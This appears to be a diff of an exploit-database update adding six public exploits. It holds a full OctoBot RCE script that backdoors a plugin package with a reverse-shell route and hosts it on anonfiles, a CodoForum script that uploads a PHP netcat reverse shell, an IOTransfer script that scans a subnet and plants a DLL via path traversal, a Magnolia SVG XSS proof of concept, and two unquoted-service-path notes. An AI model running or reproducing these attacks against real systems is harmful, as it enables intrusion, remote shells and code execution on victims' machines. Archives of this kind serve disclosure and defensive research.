DB: 2022-07-22

6 changes to exploits/shellcodes

Kite 1.2021.610.0 - Unquoted Service Path
Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path

IOTransfer 4.0 - Remote Code Execution (RCE)
Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)
CodoForum v5.1 - Remote Code Execution (RCE)
OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)

exploits/multiple/webapps/50979.py

@@ -0,0 +1,208 @@
+# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
+# Date: 9/2/2021
+# Exploit Author: Samy Younsi, Thomas Knudsen
+# Vendor Homepage: https://www.octobot.online/
+# Software Link: https://github.com/Drakkar-Software/OctoBot
+# Version: 0.4.0beta3 - 0.4.3
+# Tested on: Linux (Ubuntu, CentOs)
+# CVE : CVE-2021-36711
+
+from __future__ import print_function, unicode_literals
+from bs4 import BeautifulSoup
+import argparse
+import requests
+import zipfile
+import time
+import sys
+import os
+
+def banner():
+  sashimiLogo = """
+                              _________         .    .
+                             (..       \_    ,  |\  /|
+                              \       O  \  /|  \ \/ /
+                               \______    \/ |   \  /
+                                  vvvv\    \ |   /  |
+  _         _  _     _            \^^^^  ==   \_/   |
+ | |  __ _ | || |__ (_)_ __ ___ (_)`\_   ===    \.  |
+/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_   \ /      |
+\__ | (_| \__ | | | | | | | | | | ||/   \_  \|      /
+(   /\__,_(   |_| |_|_|_| |_| |_|_|       \________/
+ |_|       |_|                       \033[1;91mOctoBot Killer\033[1;m
+Author: \033[1;92mNaqwada\033[1;m
+RuptureFarm 1029
+
+                FOR EDUCATIONAL PURPOSE ONLY.
+  """
+  return print('\033[1;94m{}\033[1;m'.format(sashimiLogo))
+
+
+def help():
+  print('[!] \033[1;93mUsage: \033[1;m')
+  print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0]))
+  print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.')
+
+
+def getOctobotVersion(RHOST, RPORT):
+  if RPORT == 443:
+    url = 'https://{}:{}/api/version'.format(RHOST, RPORT)
+  else:
+    url = 'http://{}:{}/api/version'.format(RHOST, RPORT)
+  return curl(url)
+
+
+def restartOctobot(RHOST, RPORT):
+  if RPORT == 443:
+    url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT)
+  else:
+    url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT)
+
+  try:
+    requests.get(url, allow_redirects=False, verify=False, timeout=1)
+  except requests.exceptions.ConnectionError as e:
+    print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m')
+    time.sleep(30)
+
+
+def downloadTentaclePackage(octobotVersion):
+  print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion))
+  url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)
+  result = requests.get(url, stream=True)
+  with open('{}.zip'.format(octobotVersion), 'wb') as fd:
+    for chunk in result.iter_content(chunk_size=128):
+        fd.write(chunk)
+  print('[+] \033[1;92mDownload completed!\033[1;m')
+
+
+def unzipTentaclePackage(octobotVersion):
+  zip = zipfile.ZipFile('{}.zip'.format(octobotVersion))
+  zip.extractall('quests')
+  os.remove('{}.zip'.format(octobotVersion))
+  print('[+] \033[1;92mTentacle package has been extracted.\033[1;m')
+
+
+def craftBackdoor(octobotVersion):
+  print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion))
+  path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/'
+  injectInitFile(path)
+  injectMetadataFile(path)
+  print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion))
+
+
+def injectMetadataFile(path):
+  with open('{}metadata.py'.format(path),'r') as metadataFile:
+    content = metadataFile.read()
+    addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty'))
+    addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")'))
+  with open('{}metadata.py'.format(path),'w') as newMetadataFile:
+    newMetadataFile.write(addPayload)
+
+
+def injectInitFile(path):
+  with open('{}__init__.py'.format(path),'r') as initFile:
+    content = initFile.read()
+    addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,'))
+    addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",'))
+  with open('{}__init__.py'.format(path),'w') as newInitFile:
+    newInitFile.write(addPayload)
+
+
+def rePackTentaclePackage():
+  print('[+] \033[1;92mRepacking Tentacle package.\033[1;m')
+  with zipfile.ZipFile('any_platform.zip', mode='w') as zipf:
+    len_dir_path = len('quests')
+    for root, _, files in os.walk('quests'):
+        for file in files:
+            file_path = os.path.join(root, file)
+            zipf.write(file_path, file_path[len_dir_path:])
+
+
+def uploadMaliciousTentacle():
+  print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m')
+
+  file = {
+      'file': open('any_platform.zip', 'rb'),
+  }
+  response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60)
+  zipLink = response.json()['data']['file']['url']['full']
+  response = requests.get(zipLink, timeout=60)
+  soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
+  zipLink = soup.find(id='download-url').get('href')
+  print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink))
+  return zipLink
+
+def curl(url):
+  response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
+  return response
+
+
+def injectBackdoor(RHOST, RPORT, zipLink):
+  print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m')
+  if RPORT == 443:
+    url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
+  else:
+    url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
+
+  headers = {
+    'Content-Type': 'application/json',
+    'X-Requested-With': 'XMLHttpRequest',
+  }
+
+  data = '{"'+zipLink+'":"register_and_install"}'
+
+  response = requests.post(url, headers=headers, data=data)
+  response = response.content.decode('utf-8').replace('"', '').strip()
+
+  os.remove('any_platform.zip')
+
+  if response != 'Tentacles installed':
+    print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m')
+    exit()
+  print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m')
+
+
+def execReverseShell(RHOST, RPORT, LHOST, LPORT):
+  print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT))
+  if RPORT == 443:
+    url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
+  else:
+    url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
+  return curl(url)
+
+def isPassword(RHOST, RPORT):
+  if RPORT == 443:
+    url = 'https://{}:{}'.format(RHOST, RPORT)
+  else:
+    url = 'http://{}:{}'.format(RHOST, RPORT)
+  return curl(url)
+
+def main():
+  banner()
+  args = parser.parse_args()
+
+  if isPassword(args.RHOST, args.RPORT).status_code != 200:
+    print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m')
+
+  octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','')
+
+  if len(octobotVersion) > 0:
+    print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion))
+
+  downloadTentaclePackage(octobotVersion)
+  unzipTentaclePackage(octobotVersion)
+  craftBackdoor(octobotVersion)
+  rePackTentaclePackage()
+  zipLink = uploadMaliciousTentacle()
+  injectBackdoor(args.RHOST, args.RPORT, zipLink)
+  restartOctobot(args.RHOST, args.RPORT)
+  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
+
+
+if __name__ == "__main__":
+  parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False)
+  parser.add_argument('-h', '--help', help=help())
+  parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)
+  parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
+  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
+  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
+  main()

exploits/php/webapps/50976.txt

@@ -0,0 +1,43 @@
+# Exploit Title: Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)
+# Date: 08/05/2022
+# Exploit Author: Giulio Garzia 'Ozozuz'
+# Vendor Homepage: https://www.magnolia-cms.com/
+# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip
+# Version: 6.2.19
+# Tested on: Linux, Windows, Docker
+# CVE : CVE-2022-33098
+
+Explanation
+Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.
+
+===== REQUEST =====
+POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1
+Host: 127.0.0.1:8080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908
+Content-Length: 620
+Connection: close
+Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: iframe
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+
+-----------------------------399178799522967017241464837908
+Content-Disposition: form-data; name="140_file"; filename="xss.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+  <script type="text/javascript">
+    alert('POC - Magnolia CMS');
+  </script>
+</svg>
+
+-----------------------------399178799522967017241464837908--

exploits/php/webapps/50978.py

@@ -0,0 +1,89 @@
+# Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)
+# Date: 06/07/2022
+# Exploit Author: Krish Pandey (@vikaran101)
+# Vendor Homepage: https://codoforum.com/
+# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
+# Version: CodoForum v5.1
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2022-31854
+
+#!/usr/bin/python3
+
+import requests
+import time
+import optparse
+import random
+import string
+
+banner = """
+  ______     _______     ____   ___ ____  ____      _____ _  ___ ____  _  _
+ / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ // |( _ ) ___|| || |
+| |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_
+| |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__   _|
+ \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/|_|\___/____/   |_|
+"""
+
+print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")
+print(banner)
+print("\nExploit found and written by: @vikaran101\n")
+
+parser = optparse.OptionParser()
+parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')
+parser.add_option('-u', '--username', action="store", dest='username', help='admin username')
+parser.add_option('-p', '--password', action="store", dest='password', help='admin password')
+parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')
+parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')
+
+options, args = parser.parse_args()
+
+proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
+
+if not options.target or not options.username or not options.password or not options.ip or not options.port:
+    print("[-] Missing arguments!")
+    print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")
+    print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")
+    exit()
+
+loginURL = options.target + '/admin/?page=login'
+globalSettings = options.target + '/admin/index.php?page=config'
+payloadURL = options.target + '/sites/default/assets/img/attachments/'
+
+session = requests.Session()
+
+randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))
+
+def getPHPSESSID():
+
+    try:
+        get_PHPID = session.get(loginURL)
+        headerDict = get_PHPID.headers
+        cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]
+        return cookies
+    except:
+        exit()
+
+phpID = getPHPSESSID()
+
+def login():
+    send_cookies = {'cf':'0'}
+    send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}
+    send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"
+    auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)
+
+    if "CODOFORUM | Dashboard" in auth.text:
+        print("[+] Login successful")
+
+def uploadAndExploit():
+    send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}
+    send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}
+    send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'
+    exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)
+
+    print("[*] Checking webshell status and executing...")
+    payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)
+    if payloadExec.status_code == 200:
+        print("[+] Payload uploaded successfully and executed, check listener")
+    else:
+        print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")
+login()
+uploadAndExploit()

exploits/windows/local/50975.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path
+# Date: 2020-11-6
+# Exploit Author: Ghaleb Al-otaibi
+# Vendor Homepage: https://www.kite.com/
+# Version: Version 4.2.0.1 U1
+# Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044
+# CVE : NA
+
+# Service info:
+C:\Windows\system32\cmd.exe>sc qc KiteService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: KiteService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files\Kite\KiteService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : KiteService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

exploits/windows/local/50977.txt

@@ -0,0 +1,48 @@
+# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path
+# Discovery Date: 2022-05-07
+# Discovery by: Esant1490
+# Vendor Homepage: https://drfone.wondershare.net
+# Software Link : https://download.wondershare.net/drfone_full4008.exe
+# Tested Version: 4.0.8
+# Tested on OS: Windows 10 Pro x64 en
+# Vulnerability Type: Unquoted Service Path
+
+# Find the discover Unquoted Service Path Vulnerability:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "C:\Windows\\" |findstr /i /v """
+
+Wondershare Install Assist Service Wondershare InstallAssist
+C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto
+
+Wondershare Application Framework Service WsAppService C:\Program Files
+(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto
+Wondershare Application Update Service 3.0
+
+WsAppService3 C:\Program Files
+(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto
+
+Wondershare Driver Install Service WsDrvInst C:\Program Files
+(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto
+
+# Service info:
+
+C:\>sc qc WsDrvInst
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: WsDrvInst
+TIPO : 10 WIN32_OWN_PROCESS
+TIPO_INICIO : 2 AUTO_START
+CONTROL_ERROR : 1 NORMAL
+NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe
+GRUPO_ORDEN_CARGA :
+ETIQUETA : 0
+NOMBRE_MOSTRAR : Wondershare Driver Install Service
+DEPENDENCIAS : RPCSS
+NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt to exploit this vulnerability could allow to execute
+code during startup or reboot with the elevated privileges.

exploits/windows/remote/50974.py

@@ -0,0 +1,190 @@
+# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)
+# Date: 06/22/2022
+# Exploit Author: Tomer Peled
+# Vendor Homepage: https://www.iobit.com
+# Software Link: https://iotransfer.itopvpn.com/
+# Version: V4 and onward
+# Tested on: Windows 10
+# CVE : 2022-24562
+# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562
+
+import os
+from urllib3.exceptions import ConnectTimeoutError
+from win32com.client import *
+import requests
+import json
+
+localPayloadPath = r"c:\temp\malicious.dll"
+remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"
+remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'
+Range = "192.168.89"
+UpOrDown="Upload"
+IP = ""
+UserName = ""
+
+def get_version_number(file_path):
+    information_parser = Dispatch("Scripting.FileSystemObject")
+    version = information_parser.GetFileVersion(file_path)
+    return version
+
+
+def getTaskList(IP, taskid=""):
+    print("Getting task list...")
+    url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'
+    res = requests.get(url)
+    tasks = json.loads(res.content)
+    tasks = json.loads(tasks['content'])
+    for task in tasks['tasks']:
+        if taskid == task['taskid']:
+            print(f"Task ID found: {taskid}")
+
+
+def CreateUploadTask(IP):
+    SetSavePath(IP)
+    url = f'http://{IP}:7193/index.php?action=createtask'
+    task = {
+        'method': 'get',
+        'version': '1',
+        'userid': '*',
+        'taskstate': '0',
+    }
+    res = requests.post(url, json=task)
+    task = json.loads(res.content)
+    task = json.loads(task['content'])
+    taskid = task['taskid']
+    print(f"[*] TaskID: {taskid}")
+    return taskid
+
+
+def CreateUploadDetailNode(IP, taskid, remotePath, size='100'):
+    url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'
+    file_info = {
+        'size': size,
+        'savefilename': remotePath,
+        'name': remotePath,
+        'fullpath': r'c:\windows\system32\calc.exe',
+        'md5': 'md5md5md5md5md5',
+        'filetype': '3',
+    }
+    res = requests.post(url, json=file_info)
+    js = json.loads(res.content)
+    print(f"[V] Create Detail returned: {js['code']}")
+
+
+def readFile(Path):
+    file = open(Path, "rb")
+    byte = file.read(1)
+    next = "Start"
+    while next != b'':
+        byte = byte + file.read(1023)
+        next = file.read(1)
+        if next != b'':
+            byte = byte + next
+    file.close()
+    return byte
+
+
+def CallUpload(IP, taskid, localPayloadPath):
+    url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'
+    send_data = readFile(localPayloadPath)
+    try:
+        res = requests.post(url, data=send_data)
+        js = json.loads(res.content)
+        if js['code'] == 200:
+            print("[V] Success payload uploaded!")
+        else:
+            print(f"CreateRemoteFile: {res.content}")
+    except:
+        print("[*] Reusing the task...")
+        res = requests.post(url, data=send_data)
+        js = json.loads(res.content)
+        if js['code'] == 200 or "false" in js['error']:
+            print("[V] Success payload uploaded!")
+        else:
+            print(f"[X] CreateRemoteFile Failed: {res.content}")
+
+
+def SetSavePath(IP):
+    url = f'http://{IP}:7193/index.php?action=setiotconfig'
+    config = {
+        'tasksavepath': 'C:\\Program '
+    }
+    requests.post(url, json=config)
+
+def ExploitUpload(IP,payloadPath,rPath,taskid =None):
+    if not taskid:
+        taskid = CreateUploadTask(IP)
+        size = os.path.getsize(payloadPath)
+    CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))
+    CallUpload(IP, taskid, payloadPath)
+
+
+def CreateDownloadTask(IP, Path) -> str:
+    url = f'http://{IP}:7193/index.php?action=createtask'
+    task = {
+        'method': 'get',
+        'version': '1',
+        'userid': '*',
+        'taskstate': '0',
+        'filepath': Path
+    }
+    res = requests.post(url, json=task)
+    task = json.loads(res.content)
+    task = json.loads(task['content'])
+    taskid = task['taskid']
+    print(f"TaskID: {taskid}")
+    return taskid
+
+
+def ExploitDownload(IP, DownloadPath, ID=None):
+    if ID:
+        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'
+    else:
+        taskid = CreateDownloadTask(IP, DownloadPath)
+        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'
+    res = requests.get(url)
+    return res
+
+def ScanIP(startRange):
+    print("[*] Searching for vulnerable IPs", end='')
+    Current = 142
+    IP = f"{startRange}.{Current}"
+    VulnerableIP: str = ""
+    UserName: str = ""
+    while Current < 252:
+        print(".", end='')
+        url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'
+        try:
+            res = requests.get(url, timeout=1)
+            js = json.loads(res.content)
+            js2 = json.loads(js['content'])
+            UserName = js2['name']
+            VulnerableIP=IP
+            print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")
+            print(f"[!] Vulnerable PC username: {UserName}")
+            return VulnerableIP,UserName
+        except Exception as e:
+            pass
+        except ConnectTimeoutError:
+            pass
+        IP = f"{startRange}.{Current}"
+        Current = Current + 1
+    return None,None
+
+
+if __name__ == '__main__':
+    IP,UserName = ScanIP(Range)
+    if IP is None or UserName is None:
+        print("[X] No vulnerable IP found")
+        exit()
+    print("[*] Starting Exploit...")
+    if UpOrDown == "Upload":
+        print(f"[*]Local Payload Path: {localPayloadPath}")
+        print(f"[*]Remote Upload Path: {remotePayloadPath}")
+        ExploitUpload(IP,localPayloadPath,remotePayloadPath)
+    elif UpOrDown == "Download":
+        print(f"[*] Downloading the file: {remoteDownloadPath}")
+        res = ExploitDownload(IP, remoteDownloadPath)
+        file = open("out.pdf", "wb+")
+        file.write(res.content)
+        file.close()

files_exploits.csv

@@ -11489,6 +11489,8 @@ id,file,description,date,author,type,platform,port
 50953,exploits/windows/local/50953.txt,"Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
 50954,exploits/windows/local/50954.txt,"Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
 50959,exploits/windows/local/50959.txt,"HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path",1970-01-01,"Ali Alipour",local,windows,
+50975,exploits/windows/local/50975.txt,"Kite 1.2021.610.0 - Unquoted Service Path",1970-01-01,"Ghaleb Al-otaibi",local,windows,
+50977,exploits/windows/local/50977.txt,"Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path",1970-01-01,Esant1490,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18712,6 +18714,7 @@ id,file,description,date,author,type,platform,port
 50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple,
 50972,exploits/windows/remote/50972.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)",1970-01-01,RedHatAugust,remote,windows,
 50973,exploits/multiple/remote/50973.py,"Nginx 1.20.0 - Denial of Service (DOS)",1970-01-01,"Mohammed Alshehri",remote,multiple,
+50974,exploits/windows/remote/50974.py,"IOTransfer 4.0 - Remote Code Execution (RCE)",1970-01-01,"Tomer Peled",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45036,3 +45039,6 @@ id,file,description,date,author,type,platform,port
 50969,exploits/php/webapps/50969.txt,"WordPress Plugin Weblizar 8.9 - Backdoor",1970-01-01,"Sobhan Mahmoodi",webapps,php,
 50970,exploits/php/webapps/50970.py,"WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)",1970-01-01,cxosmo,webapps,php,
 50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnz,webapps,multiple,
